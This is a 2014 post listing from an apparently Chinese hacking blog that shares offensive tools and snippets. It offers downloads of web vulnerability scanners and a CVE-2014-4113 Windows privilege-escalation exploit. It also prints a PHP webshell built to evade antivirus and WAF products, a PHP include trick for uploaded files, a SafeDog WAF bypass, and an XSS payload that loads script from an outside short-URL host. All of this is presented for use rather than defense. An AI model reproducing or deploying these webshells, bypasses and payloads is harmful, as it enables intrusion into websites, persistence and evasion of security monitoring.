admin 发布于 2014-11-09 01:24
WEB漏洞一键提取工具
分享给大家
MScan.rar
解压密码:nmap.cc
admin 发布于 2014-11-09 01:22
轻量级网站漏洞批量扫描器
可以配合手工或者软件批量整理出网站地址
然后导入这软件里面自动识别漏洞
也是整理网盘发现的它
分享给大家
web漏洞扫描器v1.0.rar
解压密码:nmap.cc
admin 发布于 2014-11-08 10:25
利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里面正好保存了这个文件的路径,所以可以直接include进来。
<?php @include($_FILES);
<?php @include($_FILES);
使用方式也简单,构造一个html...
admin 发布于 2014-10-22 08:30
安全狗最新版绕过测试 2014-10-22
原文链接:http://phpsec.sinaapp.com/?p=270
测试版本:IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512(2014-05-29),均为今天能下到的最新版。
用于绕过的核心字符:%0A,某些特殊场合需要...
admin 发布于 2014-10-20 11:40
windows提权cve2014-4113点击下载
解压码:nmap.cc
亲测xp 32、win2003(32 and 64)、win2008(32 and 64)
admin 发布于 2014-10-19 11:47
D盾,他不认识二维数组,所以就很轻松绕过了。 对了 还有360哦~ 测试了下安全狗,也查不出来,,。
<?php
$item = 'assert';
$array = $item;
$array($_POST); //密码whirlwind 菜刀
?>
另外,关于藏危险关键词,...
admin 发布于 2014-10-13 04:17
WEBSHELL箱子系统.zip 解压密码 lanxiang
admin 发布于 2014-10-04 08:07
最近发现有不少2003登陆进去的时候,显示什么国防部啊,输入的用户名也不叫用户名了,叫国防部用户,密码也不叫密码了,叫国防部秘钥。
本文原创,转载留请带版权,谢谢合作。HTTP://NMAP.CC
如图:
那叫个装逼啊。
下面我把方法告诉大家,首先把system32下的m...
admin 发布于 2014-10-03 03:20
<img src=x onerror=document.body.appendChild(createElement('script')).src='http://126.am/ia8Vp4'>
onerror="with(document)body.appendChild(createElement('script'))....